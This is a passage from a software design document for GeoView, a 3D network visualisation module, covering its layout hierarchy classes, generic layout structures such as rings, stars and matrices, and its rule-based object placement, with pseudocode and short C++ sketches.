LH_Node inherits from Cfltem and contains the base interface for all classes in GeoView. This interface includes the ability to set and check placement flags that indicate the type of an object, add and remove objects from the scenegraph, look up operations in the MasterTable, and placement specific functions.
LH_Root provides the instance for the root of the GeoView universe and is the core interface to the Layout Hierarchy data structure. It allows the insertion of events into the World, the look-up of all nodes, the application of layout rules, object composition and placement caching for speed-up.
LH_Leaf represents the actual visual objects in GeoView. It provides an interface for altering any visual aspects of objects, as well as an interface for maintaining any attachment or containment relationships an object may have.
LH_EdgeSet maintains the set of connection lines in the World. It also has provision for temporarily turning lines on and off.
LH_CoordGroupSet is a singleton container class for LH_CoordGroup(s) that is itself a container for layout structures and/or leaf objects. It groups those objects together for which specific location data is known, and maintains them positioned as close as possible to that location.
LH_SNode is the abstract parent class for the layout structure classes. It provides the interface to the layout structures allowing insertion and deletion of objects, calling on the relative placement of objects and the maintenance of graph edges and location data for layout structures.
The layout structure classes themselves are grouping constructs for leaf objects and provide the interface to the LSTL generic layout structures. These can be instantiated with generic objects specific to views and the objects are placed on the basis of the traits particular to the layout structure (e.g. Star or Graph). Grouping rules are specified in the MasterTable.
4.1.2.2 Logical Object Hierarchy
FIG. 18 shows the Logical Object View of the types of parent-child relationships allowable in the data structure, and how these classes work together to form the logical object view of the GeoView visual system, which is also hierarchical.
The three singletons of Root, CoordGroupSet and Top Level Structure form level 0 and level 1 of the layout hierarchy tree.
A Root instance forms the parent of the tree that represents the logical structure and interconnections between objects (LH_Leaf) and grouping constructs (children of LH_CoordGroupSet or LH_SNode in FIG. 17). The interconnections of these objects and groups are mirrored in the Scene Graph, which is the interface to the renderer visual system.
At the second level of the hierarchy there are two singleton instances, viz. the Top Level Structure and the CoordGroupSet. All objects with location data, or layout structures that have inherited location data, are placed into a CoordGroup within the CoordGroupSet representing the geographic region given by the location. Visual objects when they first enter the world are placed into the Top Level Structure, which is the base layout structure of the world. CoordGroups contain nodes with specific location data, whilst all nodes beneath the Top Level Structure undergo relative placement based on the layout structure of which they are a child.
The Top Level Structure works as a default layout structure for leaf nodes that have no relevant layout rules specified in the MasterTable. The Top Level Structure is special in that it is the only structure that may itself directly contain a child layout structure.
Structures are layout structures that are children of the Top Level Structure, whereas sub-structures are Layout Structures that are used to group leaf nodes that are located-in or attached-to other leaf nodes. Note that the concept of attachment and containment are the cause of the arbitrary depth of the layout hierarchy tree. Intuitively arbitrary objects may be attached to one another and similarly objects may be placed inside of other objects to, effectively, arbitrary depth.
The grouping objects are akin to the C3DGroup objects and the leaf nodes are akin to the C3DLeaf objects of the Scene Graph. The parent-child relationships (edges of the layout hierarchy) are mirrored in structure in the Scene Graph, thus the locations of children may be specified relative to the parent object. For more detailed design of C3D.
4.1.2.3 Processing
This section provides a detailed description of the processing that occurs in the phases of building the Geo View universe outlined in Section 4.1.1.4 of this part. Description of the individual class methods is included in Section 5 of this part.
1. Root Initialisation
The singleton instances of LH_EdgeSet and LH_CoordGroupSet are created during the initialisation of the Root (LH_Root) of the layout hierarchy. The Top Level Structure of the hierarchy is also created, which acts as the default structure node for leaf nodes without parent structures. The root is itself created during the GeoView initialisation. Each of the singletons is a child of Root, and the Root itself is inserted into the Scene Graph, effectively becoming the Scene Graph parent of the layout hierarchy.
2. Event Insertion and Removal
In this phase, entire objects or attributes of objects are added or removed from the layout hierarchy data structure. The four operations are ADD_OBJECT, ADD_ATTRIBUTES, REPLACE_OBJECT and REPLACE_ATTRIBUTES. This is the initial phase and is instigated by the insertion of events by the World Monitor.
Object attributes may be inversable. This means that the attribute relates to two objects, and can be read in a left to right or right to left manner. For example, for Object A and Object B, if we have A is_contained_within B, then the inverse of this is B contains A. When such attributes are added to an object the inverse of the relationship is added to the secondary object. If attributes are removed, then such inversed attributes must also be removed from the secondary objects.
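A small C++ sketch of the inverse attribute bookkeeping is given below, using a flat map of object ids in place of the real layout hierarchy leaf nodes; the types and function names are assumptions made for illustration only.

#include <map>
#include <set>
#include <string>
#include <utility>

// Illustrative sketch only.
using Relation = std::pair<std::string, std::string>;        // (attribute name, other object id)
using Store    = std::map<std::string, std::set<Relation>>;  // object id -> relations held

// Adding an inversable attribute records the relationship on both objects;
// removing it strips both directions again.
void addInversable(Store& s, const std::string& a, const std::string& attr,
                   const std::string& b, const std::string& inverseAttr) {
    s[a].insert({attr, b});
    s[b].insert({inverseAttr, a});
}

void removeInversable(Store& s, const std::string& a, const std::string& attr,
                      const std::string& b, const std::string& inverseAttr) {
    s[a].erase({attr, b});
    s[b].erase({inverseAttr, a});
}

For the example above, addInversable(store, "A", "is_contained_within", "B", "contains") records both directions of the relationship, and removeInversable undoes both.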
Attributes are added to, or removed from, objects that correspond to leaves in the layout hierarchy class structure and which correspond to graphical objects in the GeoView universe. These leaf nodes are then cached for further processing at the end of the insertion of a batch of objects and attributes.
Section 5 of this part contains method descriptions for the following cases:
• Insertion;
• Adding Inverse Attributes;
• NetworkObject Insertion and Removal; and
• Attribute Insertion
3. Leaf Building
In this phase, graphical objects (leaves) are built according to their visual mappings in the MasterTable.
The LH_Leaf class has an aggregation relationship ('contains') to the CV3DObject class, which in turn is derived from the Generic3DObject class. The 3D object class is a descendant of the C3D object classes (see reference [6]) that implement rendering. When visual information about a Layout Hierarchy object (leaf node) arrives via events it is passed on to the respective CV3DObject instance.
4. Layout Rule Application
In this phase, the parent-child relationships of leaf nodes to structure nodes and each other are made on the basis of rules in the MasterTable. The structure nodes that are required to perform placement of leaf nodes are cached, i.e. data structures detailing the hierarchical relationship of objects are built, but not yet physically laid out.
Section 5 of this part contains method descriptions for the following cases:
• Apply Layout Structure Rules to Objects;
• Handle Generic Layout Structures;
• Handle Instance Matches;
• Apply Attached-to Rules to Objects;
• Apply Located-in Rules to Objects;
• Find Satisfied Rules; and
• Compose Objects.
5. Leaf Edge Creation
In this phase, all edges in the GeoView Universe are placed in the LH_EdgeSet singleton when they are created. The locations of their endpoints are not maintained in the traditional hierarchical relative fashion via transform groups in the Scene Graph, since edges do not conceptually have a single location but span two. As a result of this, each time a node or subtree in the layout hierarchy tree changes, each edge must have its position updated.
Section 5 of this part contains method descriptions for the following cases:
• Create Edges;
• Create Edge;
• Update Edges;
• Add Edge; and
• Add Graph Edge.
6. Object Relative Placement
In this phase, each level of the layout hierarchy tree undergoes placement by caching objects requiring placement into the level above, until the root of the layout hierarchy tree is reached. In this way, we can ensure that relative placement is called a maximum of once only on each structure in the entire layout hierarchy.
The parent layout structure of an object places it according to the placement algorithm of that structure. For example, a ring layout structure places its child objects spaced evenly around the circumference of a circle. Each layout structure has settings particular to its layout shape.
4.1.3 Layout Structure Template Library (LSTL)
This section describes the Layout Structure Template Library (LSTL), which consists of a set of C++ formatting classes. A formatting class is one which contains pointers to other objects (T) and performs some kind of formatting on those objects. The LSTL classes are responsible for placing the objects they are given into layout structures such as rings, stars, lines etc. The LSTL is a generic library and all components of the LSTL are templates.
The LSTL contains the following template classes:
• GenericGraph<T>
• GenericLine<T>
• GenericMatrix<T>
• GenericRing<T>
• GenericStar<T>
• GenericRectangle<T>
• GenericTree<T>
Each of these classes is a template, and can be instantiated to contain any type of object. The only restriction on the object is that it must supply the required interface functions as described in Section 5. Each of the classes in the LSTL described in the sub-sections below defines an interface as described in Section 5 of this part.
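To illustrate the formatting class idea, the following C++ template sketches a ring-style layout. The required interface functions assumed here (getRadius and setPosition) and the placement arithmetic are illustrative assumptions only and are not the actual LSTL interface described in Section 5.

#include <algorithm>
#include <cmath>
#include <cstddef>
#include <vector>

// Illustrative sketch only.
template <typename T>
class GenericRingSketch {
public:
    void add(T* obj) { objects_.push_back(obj); }

    // Place contained objects evenly around a circle. The dynamic radius grows
    // with object size and separation but never drops below the user minimum.
    void layout(double minRadius, double separation, bool clockwise) {
        const std::size_t n = objects_.size();
        if (n == 0) return;
        if (n == 1) { objects_[0]->setPosition(0.0, 0.0, 0.0); return; }  // single object at the origin
        const double pi = 3.14159265358979;
        double circumference = 0.0;
        for (T* o : objects_) circumference += 2.0 * o->getRadius() + separation;
        double radius = std::max(minRadius, circumference / (2.0 * pi));
        for (std::size_t i = 0; i < n; ++i) {
            double angle = (clockwise ? -1.0 : 1.0) * 2.0 * pi
                           * static_cast<double>(i) / static_cast<double>(n);
            objects_[i]->setPosition(radius * std::cos(angle), 0.0, radius * std::sin(angle));
        }
    }

private:
    std::vector<T*> objects_;
};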
4.1.3.1 GenericGraph
This layout structure places the objects in a graph, based on edge connections between those objects. The graph algorithm attempts to situate objects by spatially representing their interconnections whilst minimising edge crossovers. The user can specify the following settings:
• NODE SEPARATION FACTOR: This value indicates the amount of separation between nodes in the graph (horizontal spacing) relative to a unit value of 1.0.
• RANK SEPARATION FACTOR: Similar to the node separation factor, this value represents the separation between ranks (vertical spacing).
• ORIENTATION: This value determines whether the graph is orientated top-to-bottom or left-to-right.
The default ratio of node separation factor to rank separation factor is 1:3. FIG. 19 shows the Object Layout Structure, illustrating how the above settings relate to the graphs produced.
4.1.3.2 GenericLine
This layout structure places the objects in a line. The user can specify the following arguments:
• AXIS: This determines to which axis (x, y or z) the line will be parallel.
• LINEAR DIRECTION: This determines whether the line extends along the axis in a positive or negative direction.
• ORIGIN: This determines whether the origin is located at the front, back or centre of the line.
• SEPARATION: This is the amount of spacing the algorithm leaves between each object in the line.
FIG. 20 shows what the line will look like with various GenericLine DIRECTION and ORIGIN combinations.
4.1.3.3 GenericMatrix
This layout structure places objects in a matrix. By default objects are added into the matrix in a clockwise spiral as shown below:

24  9 10 11 12
23  8  1  2 13
22  7  0  3 14
21  6  5  4 15
20 19 18 17 16
The user can specify the following arguments:
• WIDTH_SEPARATION: This is the amount of space in the X axis that is left between objects in the matrix.
• DEPTH_SEPARATION: This is the amount of space in the Z axis that is left between objects in the matrix.
• DELETE_POLICY: This determines what the algorithm will do when an object is removed from the matrix. It can either leave a gap, fill in the gap with the last object or shuffle back all of the objects after the gap.
• ORIGIN_POLICY: Determines where the true centre of the matrix is located, either where the first object in the matrix is placed or at the true centre.
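By way of illustration only, the following C++ sketch shows one way the default clockwise spiral could map an insertion index to a grid offset, with index 0 at the centre of the matrix. The function spiralOffsets and its details are assumptions made for this sketch and are not part of the GenericMatrix implementation; the offsets produced would subsequently be scaled by WIDTH_SEPARATION and DEPTH_SEPARATION.

    #include <cstddef>
    #include <cstdio>
    #include <utility>
    #include <vector>

    // Illustrative helper (not part of GenericMatrix): returns grid offsets
    // (column, row) for the first n objects of a clockwise spiral, index 0 at
    // the centre. Segment lengths follow the pattern 1, 1, 2, 2, 3, 3, ... and
    // the walk direction cycles up, right, down, left (i.e. clockwise).
    std::vector<std::pair<int, int> > spiralOffsets(int n)
    {
        std::vector<std::pair<int, int> > offsets;
        int x = 0, z = 0;                        // (column, row)
        const int dx[4] = {0, 1, 0, -1};         // up, right, down, left
        const int dz[4] = {-1, 0, 1, 0};
        int dir = 0, segment = 1, walked = 0;
        offsets.push_back(std::make_pair(x, z)); // index 0 sits at the origin
        while (static_cast<int>(offsets.size()) < n) {
            for (int step = 0; step < segment && static_cast<int>(offsets.size()) < n; ++step) {
                x += dx[dir];
                z += dz[dir];
                offsets.push_back(std::make_pair(x, z));
            }
            dir = (dir + 1) % 4;                 // turn clockwise
            if (++walked % 2 == 0) ++segment;    // lengths: 1, 1, 2, 2, 3, 3, ...
        }
        return offsets;
    }

    int main()
    {
        // The offsets would then be scaled by WIDTH_SEPARATION and DEPTH_SEPARATION.
        std::vector<std::pair<int, int> > grid = spiralOffsets(25);
        for (std::size_t i = 0; i < grid.size(); ++i)
            std::printf("%2u -> (%d, %d)\n", static_cast<unsigned>(i), grid[i].first, grid[i].second);
        return 0;
    }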
4.1.3.4 GenericRing
This layout structure places objects in a ring. The user can specify the following arguments:
• ANGULAR DIRECTION: This determines the direction in which objects are placed on the ring. It can be either clockwise or anti-clockwise.
• RADIUS: This is a minimum radius for the ring. The algorithm determines a dynamic radius based on object size and separation; the larger of the dynamic radius and the user-specified radius is used.
• SEPARATION: The amount of separation to leave between objects. The greater the separation the greater the dynamic radius of the resulting ring.
FIG. 21 shows a five-object ring with CLOCKWISE direction. The origin will always be at the centre of the ring. If a ring contains only one object then it will be placed at the origin.
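By way of illustration only, the following C++ sketch shows one plausible calculation of the dynamic radius described above: the circumference must accommodate every object's diameter plus the requested separation, and the larger of the resulting radius and the user-specified minimum is used. The function effectiveRingRadius is an assumption for this sketch, not the actual GenericRing code.

    #include <algorithm>

    // Illustrative sketch (not the GenericRing code): the circumference must fit
    // every object's diameter plus the requested separation, giving a lower
    // bound on the radius of n * (2 * boundsRadius + separation) / (2 * pi).
    // The larger of that value and the user-specified minimum radius is used.
    double effectiveRingRadius(int numObjects, double maxBoundsRadius,
                               double separation, double userRadius)
    {
        const double pi = 3.14159265358979323846;
        const double dynamicRadius =
            numObjects * (2.0 * maxBoundsRadius + separation) / (2.0 * pi);
        return std::max(dynamicRadius, userRadius);
    }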
4.1.3.5 GenericStar
This layout structure places objects in a star. One object will be assigned by the user as the root of the star and placed at the origin. The rest of the objects will be the leaves of the star and will be placed using a GenericRing. As well as the GenericRing arguments the user can also specify:
• ROOT_HEIGHT: This is the amount that the root of the star is raised above the plane.
4.1.3.6 GenericRectangle
This layout structure places objects in a rectangle. The user can specify the following arguments:
• ANGULAR DIRECTION: The direction (clockwise or anti-clockwise) in which objects are placed around the rectangle.
• START_SIDE: The side on which to start layout. The sides are numbered 0-3 with 0 being the top (far) side and subsequent sides extending clockwise.
• WIDTH_SEPARATION: The separation between objects in the width axis.
• DEPTH_SEPARATION: The separation between objects in the depth axis.
• WIDTH: Specifies the width dimension of the resulting rectangle.
• DEPTH: This specifies the depth dimension of the resulting rectangle.
If width or depth values are provided, then the radius of the objects, WIDTH_SEPARATION and DEPTH_SEPARATION will not be used in the layout.
4.1.3.7 GenericTree
This layout structure, like GenericGraph, also places the objects in a graph, based on edge connections between those objects. GenericTree uses the same graph algorithm to determine the layout, but with different parameters. The Tree graph is a directed edge graph, where edge direction is determined by the MasterTable's layout rules. For example, if the MasterTable specifies a Shared_Data_Link's layout rule as:
• “layout-structure Tree is_connected_to==type_of(Computer)”,
any Shared Data Link network object connected to a Computer will be laid out as a Tree, with the direction of the edge from the Shared Data Link to the Computer. In this way, rather than the layout of a Tree being non-deterministic given the same set of events, the Tree will be laid out in the same way each time. However, there are a few exceptions to this rule. If two objects of the same type are connected, or if at least one of the nodes is a structure node, then the direction becomes non-deterministic, as with GenericGraph.
4.2 Concept of Execution
The execution concept for the GeoView module, including the flow of control, is described in Section 4.1 and Section 4.3 of this part.
4.3 Interface Design
Like DataView, GeoView interfaces with the Registry module and the Tardis, which allow events and commands to be sent to it. The events arrive from the Intelligent Agents, and the commands arrive from the user via different user tools, such as the Navigation System (nav) and the Configuration Editor (ConfigEd).
The Tardis handles incoming events from the agents, and commands are sent to GeoView via the Command Control Interface (CCI).
FIG. 22 shows the process interactions between the View Applications (GeoView/DataView), the Registry, and the Tardis.
5. Module Detailed Design
This section contains, for the GeoView module, the detailed design descriptions for the GeoView, LayoutHierarchy and LayoutStructureTemplateLibrary classes.
5.1 Geo View Classes
5.1.1 Geo View Class Summary
Table 3 identifies a full list and description of the GeoView classes.
TABLE 3
GeoView Classes
Class Name                    Description
GV_Action                     The GeoView specific action class.
GV_ActionMan                  The GeoView specific action manager class.
                              Knows how to iterate over the LayoutHierarchy
                              to return all nodes.
GV_3DObject                   The GeoView 3DObject.
GVPacketMotionEffect          Class that allows a simple motion effect.
GV_EventFileReader            The GeoView specific event file reader.
GV_WorldMonitor               The GeoView specific class for the World
                              Monitor.
GeoView                       The main (singleton) class for the GeoView
                              application.
ControlGeoViewWorldService    Class for adding GeoView specific services to
                              the CVSVWorld CCI interface.
GeoViewCanvas                 Display/interface handling for GeoView.
GeoViewSettings               Subclass of ApplicationSettings to hold the
                              application specific settings for GeoView.
5.2 LayoutHierarchy Classes
5.2.1 LayoutHierarchy Class Summary
Table 4 identifies a full list and description of the LayoutHierarchy classes.
TABLE 4
LayoutHierarchy Classes
Class Name Description
LH_CoordGroup       This class contains a group of nodes whose (x, z)
                    coordinates all fall within a specific range.
LH_CoordGroupSet    This class contains a set of related LH_CoordGroup
                    nodes.
LH_Edge             This class stores information about one edge in the
                    LayoutHierarchy.
LH_EdgeSet          This class is a container for all edges in the
                    LayoutHierarchy.
LH_Graph            This class is a container for a group of nodes that
                    are arranged as an undirected graph.
LH_Leaf             The lowest node in the LayoutHierarchy. An LH_Leaf
                    node contains a NetworkObject and a corresponding
                    SV3DObject which contains the 3D data that represents
                    the NetworkObject according to the rules in the
                    MasterTable.
LH_Line             This class is a container for a group of nodes that
                    are arranged in a line.
LH_Matrix           This class represents a Matrix layout structure.
                    Nodes are added to the Matrix in a clockwise spiral.
LH_Node             This is the base class for all nodes in a
                    LayoutHierarchy. This class maintains the following
                    variables: LH_Root* mRootOfLH, a pointer to the root
                    of the LayoutHierarchy; LH_Node* mParent, a pointer
                    to the parent of this node; C3DBranchGroup*
                    mBranchGroup, a pointer to the branch group that
                    contains the geometry of this node. This branchgroup
                    is attached to the branchgroup of this node's parent,
                    which means that mRootOfLH.mBranchGroup contains the
                    geometry for the entire LayoutHierarchy (via a bit
                    pattern); int mPlaced, a variable that contains
                    information about what layout rules have been used to
                    place this node.
LH_Ring             This class represents a ring shaped layout structure.
                    A ring has an LH_Leaf as its root and a list of
                    LH_Nodes as its children. The branchgroup of the root
                    is placed under this node's branchgroup and the
                    branchgroups of the children are placed under the
                    root's branchgroup.
LH_Root             This class is the top level node in the
                    LayoutHierarchy. It is responsible for maintaining a
                    list of other LH_Node objects and performing layout
                    operations on them. It contains a pointer to the
                    MasterTable that is used for layout.
LH_SNode            This class is the base class for all structure nodes
                    in the LayoutHierarchy. All structure classes
                    (LH_Star, LH_Matrix, LH_Line etc.) inherit from this
                    base class and it provides an extra interface on top
                    of the standard LH_Node interface.
LH_Star             This class represents a star shaped layout structure.
                    A star has an LH_Leaf as its root and a list of
                    LH_Nodes as its children. The branchgroup of the root
                    is placed under this node's branchgroup and the
                    branchgroups of the children are placed under the
                    root's branchgroup.
LH_Tree             This class is a container for a group of nodes that
                    are arranged as a directed graph, where edge
                    direction is determined by layout relationships
                    between different objects.
NetworkObject       Contains information about a NetworkObject.
5.2.2 Event Insertion and Removal Methods
5.2.2.1 cfInsert
This is the insertion method called directly by the World Monitor. A command, a network object and an address are specified. Depending on the command, objects or attributes are added to or removed from the GeoView world.
• LH_Root::cfInsert(COMMAND, NetworkObject)
• On the basis of the COMMAND
• (where COMMAND=ADD_OBJECT or ADD_ATTRIBUTES)
• addInverseAttributes(networkObject) [Section 5.2.2.2]
• cfInsertNetworkObjectAdd(networkObject) [Section 5.2.2.3]
• (where COMMAND=REPLACE_OBJECT)
• removeInverseAttributes(networkObject)
• cfInsertNetworkObjectReplace(networkObject) [Section 5.2.2.3]
• addInverseAttributes(networkObject) [Section 5.2.2.2]
• (where COMMAND=REPLACE_ATTRIBUTES)
• removeInverseAttributes(networkObject)
• cfInsertNetworkObjectAttributesReplace(networkObject) [Section 5.2.2.3]
• addInverseAttributes(networkObject) [Section 5.2.2.2]
5.2.2.2 Adding Inverse Attributes
Each attribute is checked to see if it has a corresponding inverse attribute. If so a lookup of the secondary object is made. If it does not exist it is created and the inverse attribute is added to it, otherwise the inverse attribute is added to the existing secondary object.
LH_Root::addInverseAttributes(networkObject)
    FOR each attribute in the networkObject
        IF there exists an inverse relationship
            Find the objectname from the value of the attribute
            IF the leaf named objectname does NOT exist
                Create a leaf named objectname
            ENDIF
            Add the inverse relationship to the leaf using the name of the object
        ENDIF
    END FOR
5.2.2.3 NetworkObject Insertion
Each of the attributes from the passed in network object are added to the network object of the leaf node. The leaf node is then cached for further processing after the entire current batch of events has arrived.
• LH_Root::cfInsertNetworkObjectAdd(networkObject, address)
• FOR each attribute in the networkobject
• Call cfInsertAttrib(attribute, address) [Section 5.2.2.4]
• END FOR
• Call layout(leaf)
5.2.2.4 Attribute Insertion
If the leaf object specified by address does not yet exist then a new leaf is created and added to the lookup hash map. Otherwise the attribute is added to the existing leaf.
LH_Root::cfInsertAttrib( attribute, address )
    Do a lookup of leaf using address
    IF the leaf does not exist yet
        Create the leaf
        Add attribute to leaf
        Add leaf to leaf hash map
    OTHERWISE
        Add attribute to leaf
        IF attribute added successfully
            IF attribute added was LOCATED_AT
                Do any necessary location processing
            ENDIF
        ENDIF
    ENDIF
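By way of illustration only, the lookup-or-create pattern of cfInsertAttrib could be realised in C++ as sketched below. The class and member names (LeafTable, Leaf, Attribute) are assumptions introduced for this sketch and do not appear in the design above.

    #include <memory>
    #include <string>
    #include <unordered_map>

    // Illustrative stand-ins for the real classes; the names are assumptions.
    struct Attribute { std::string name; std::string value; };

    struct Leaf
    {
        std::string address;
        std::unordered_map<std::string, std::string> attributes;
        bool addAttribute(const Attribute& a)
        {
            attributes[a.name] = a.value;   // real leaves hold far richer state
            return true;
        }
    };

    class LeafTable
    {
    public:
        // Look up the leaf by address, creating it on first use, then add the
        // attribute. A LOCATED_AT attribute triggers extra location processing.
        void insertAttrib(const Attribute& attribute, const std::string& address)
        {
            auto it = leaves.find(address);
            if (it == leaves.end()) {
                std::unique_ptr<Leaf> leaf(new Leaf());
                leaf->address = address;
                leaf->addAttribute(attribute);
                leaves[address] = std::move(leaf);
                return;
            }
            if (it->second->addAttribute(attribute) && attribute.name == "LOCATED_AT") {
                // ... any necessary location processing would go here ...
            }
        }

    private:
        std::unordered_map<std::string, std::unique_ptr<Leaf> > leaves;
    };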
5.2.3 Layout Rule Application Methods
5.2.3.1 applyLayoutStructureRulesToObject
Structure Rules specify the logical groupings of world objects (represented as leaf nodes in the virtual world) by mapping them to layout structures on the basis of attribute tests. If a relevant layout structure is found via the structure rules then it is placed into this structure (which is created if necessary).
LH_Root::applyLayoutStructureRulesToObject( leaf )
    Call findSatisfiedRules( "layout-structure", rules, satisfiers ) on the leaf [Section 5.2.3.4]
    IF a satisfying layout structure was found
        Process depending on the type of the layout structure
        LAYOUT_STRUCTURE_LINE
            IF the leaf is not already in a line layout structure
                Call handleGenericLayoutStructure( rule, satisfiers, leaf, LINE )
            ENDIF
        LAYOUT_STRUCTURE_RING
            IF the leaf is not already in a ring layout structure
                Call handleGenericLayoutStructure( rule, satisfiers, leaf, RING )
            ENDIF
        LAYOUT_STRUCTURE_MATRIX
            IF the leaf is not already in a matrix layout structure
                Call handleGenericLayoutStructure( rule, satisfiers, leaf, MATRIX )
            ENDIF
        LAYOUT_STRUCTURE_STAR
            The star layout structure is specially handled.
            handleStarLayoutStructure( )
        LAYOUT_STRUCTURE_GRAPH
            Note that since graph is designed to merge with other structure
            types, no check of being in an existing graph is made here.
            Call handleGenericLayoutStructure( rule, satisfiers, leaf, GRAPH )
    ENDIF
1. handleGenericLayoutStructure
Assign the primary leaf node (the ‘this’ object) and the secondary leaf (parameter ‘leaf’) to an appropriate structure (which will possibly need to be created) on the basis of each satisfying attribute.
LH_Root::handleGenericLayoutStructure( rule, satisfiers, leaf, structure )
    ITERATE over each of the satisfier attributes
        IF there exists a secondary leaf (ie. this is a two-way relationship match)
            test if any primary leaf ancestor is in type of structure
            test if any secondary leaf ancestor is in type of structure
            IF neither are in a structure already
                Create a structure of type structure and add them both to it
            OTHERWISE IF both in different structures
                merge those two structures into one of type structure
            OTHERWISE one is not in a structure
                add it to the one that IS
            ENDIF
        OTHERWISE
            handle an Instance Match
        ENDIF (there exists a secondary leaf node)
    END ITERATION (over each attribute)
2. handleInstanceMatch
Each instance structure is stored using a unique objectTypeName: mappingLayoutRule key. For each instance it is checked to see if a structure for this particular layout rule and type already exists; if so it is added to it, otherwise an entirely new structure with this object's type and rule signature is created.
LH_Root::handleInstanceMatch( structure, node, rule, rootOfStar )
    Create a unique object key using CfItem::makeAddress with the object type
        and the rule name
    IF a structure currently has this signature
        add this leaf node to that structure
    OTHERWISE
        create the new structure
        add the structure with unique key to a lookup hash map
        add this leaf node to the structure
    ENDIF
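By way of illustration only, the instance-structure bookkeeping described above could be sketched in C++ as follows. CfItem::makeAddress is approximated here by simple string concatenation, and the class names are assumptions for this sketch.

    #include <map>
    #include <memory>
    #include <string>

    struct LayoutStructure { /* ring, line, matrix, ... (elided) */ };

    // Illustrative sketch of the instance-match bookkeeping. CfItem::makeAddress
    // is approximated by concatenation; the real key format is not shown above.
    class InstanceStructures
    {
    public:
        LayoutStructure& structureFor(const std::string& objectType,
                                      const std::string& ruleName)
        {
            const std::string key = objectType + ":" + ruleName;   // unique signature
            auto it = structures.find(key);
            if (it == structures.end()) {
                // No structure with this signature yet: create it and register it.
                it = structures.emplace(key, std::unique_ptr<LayoutStructure>(
                                                 new LayoutStructure())).first;
            }
            return *it->second;                                    // caller adds the leaf
        }

    private:
        std::map<std::string, std::unique_ptr<LayoutStructure> > structures;
    };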
5.2.3.2 applyAttachedToRulesToObject
Placement Rules specify the attachment and containment relationships of world objects on the basis of attribute tests. If a relevant attachment relationship is found via the layout rules then the primary object is either placed into an attachment relationship as the parent (i.e. things are attached to it) or as the child (i.e. attached to something). During this process any relevant layout rule arguments (LRAs) are read.
LH_Root::applyAttachedToRulesToObject( leaf )
    Call findSatisfiedRules( "attached-to", rules, satisfiers ) on the leaf [Section 5.2.3.4]
    IF any satisfying rules were found
        ITERATE through each satisfying rule found
            read any layout rule arguments for this layout rule
            IF this is NOT an inverse rule
                (The primary object is attached to a single other parent)
                find secondary leaf node using the attribute value and the leaf hash map
                set sub-structure scaling on the basis of any layout rule arguments
                Call composeObjects( primary leaf, secondary leaf, "attached-to", LRAs )
            OTHERWISE
                (The primary object is the parent of the attached-to relationship)
                ITERATE through each satisfying attribute found
                    find the secondary leaf node via the attribute value and lookup
                    set sub-structure scaling on the basis of any layout rule arguments
                    Call composeObjects( secondary leaf, primary leaf, "attached-to", LRAs )
                END ITERATION (each attribute)
            END IF (rule is inverse)
        END ITERATION (each rule)
    END IF (any satisfying rules found)
5.2.3.3 applyLocatedInRulesToObject
Placement Rules specify the attachment and containment relationships of world objects on the basis of attribute tests. If a relevant containment relationship is found via the layout rules then the primary object is either placed into a containment relationship as the parent (i.e. things are contained within it) or as the child (i.e. inside of something). During this process any relevant LRAs are read.
LH_Root::applyLocatedInRulesToObject( leaf )
    Call findSatisfiedRules( "located-in", rules, satisfiers ) on the leaf [Section 5.2.3.4]
    IF any satisfying rules were found
        ITERATE through each satisfying rule
            Read any layout rule arguments associated with the rule
            IF the rule is NOT inversed
                (Primary leaf node will be located in another leaf node)
                find the secondary leaf node via lookup using the first satisfier attribute value
                call composeObjects( primary leaf, secondary leaf, "located-in", LRAs )
            OTHERWISE
                (Secondary leaf node will have other leaf nodes located within it)
                ITERATE through each of the satisfying attributes
                    find the current secondary leaf node via lookup with the attribute's value
                    call composeObjects( secondary leaf, primary leaf, "located-in", LRAs )
                END ITERATION (each satisfying attribute)
            END IF (rule is inverse?)
        END ITERATION (each satisfying rule)
    END IF (any satisfying rules were found)
5.2.3.4 findSatisfiedRules
Find any matching structure rules from the MasterTable for the leaf node. For any found, record the rule matched, and an array of the satisfying attributes. Wildcards may be matched if they are present in the MasterTable. Processing of the unique LRA is done in this function also, matching instances as necessary.
LH_Node::findSatisfiedRules( ruleType, returned list of matching rules,
        returned array indexed by matched rules of a list of attributes that match the rule )
    get the networkObject for this leaf node
    build the list of layout mappings associated with objects of this type via
        cfGetChildren in mTable (eg. "MasterTable:GeoView:Computer:layout-structure")
    append to this list any WILDCARD matches
    ITERATE through each mapping layout
        get the ObjectAttributeTest for the mapping layout
        IF the layout rule from the mapping layout is of the required rule type
            IF the secondary object is a WILDCARD
                (Secondary object wildcard processing)
                create any rules and satisfying attributes for this wildcard
            OTHERWISE (secondary object is not a WILDCARD)
                (Secondary object normal processing)
                IF the right hand side of the layout rule represents an object type
                    (Relationship processing)
                    call getAttributesThatSatisfy to build satisfying attributes on the OAT
                OTHERWISE
                    (Do instance processing)
                    IF there is a unique flag in the Layout Rule Arguments
                        call doUniqueLRAProcessing( TODO )
                    OTHERWISE (no unique flag)
                        find first attribute
                    END IF (unique flag exists?)
5.2.3.5 composeObjects
The passed in parent and child objects are composed or aggregated into an object composition via attachment or containment, i.e. with containment the child is contained within the parent and with attachment the child is attached to the parent. It is asserted that the child cannot be a descendant of the parent.
Special processing is done in the case where the child is in a layout structure already and the parent is not. In this case the child is removed from the layout structure, composed with the parent, and then the entire object composition is reinserted back into the original child layout structure.
Consider the case where both the parent and child are already in layout structures. In this instance the parent takes precedence and as such the child is removed from its layout structure and composed with the parent (implicitly placing it into the parent's layout structure.)
LH_Root::composeObjects( parent, child, composition type )
    IF the child is already attached-to or located-in
        EXIT function
    END IF (child already attached-to or located-in)
    IF the child is an ancestor of the parent
        REPORT error
    END IF (check not ancestor)
    SET child structure to the layout structure (if any) that the child is in
    IF composition type is attachment
        Call attach( child ) on parent
    OTHERWISE (composition type not attachment)
        Call contain( child ) on parent
    END IF (composition type)
    IF the child WAS in a layout structure AND the parent is not
        INSERT the new composite object into the child structure
    END IF (child was in layout structure and parent isn't)
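By way of illustration only, the precedence rules of composeObjects can be condensed into the following C++ sketch. The Node and Structure stand-in types are assumptions introduced so the sketch is self-contained; they are not the LH_Node or LH_SNode interfaces.

    #include <stdexcept>

    // Minimal stand-in types so the sketch compiles on its own.
    struct Structure;

    struct Node
    {
        Structure* structure = nullptr;   // layout structure the node sits in, if any
        Node* composedParent = nullptr;   // attached-to / located-in parent, if any

        bool isComposed() const { return composedParent != nullptr; }
        bool isAncestorOf(const Node& other) const
        {
            for (const Node* n = other.composedParent; n != nullptr; n = n->composedParent)
                if (n == this) return true;
            return false;
        }
        void attach(Node& child)  { child.composedParent = this; }
        void contain(Node& child) { child.composedParent = this; }
    };

    struct Structure
    {
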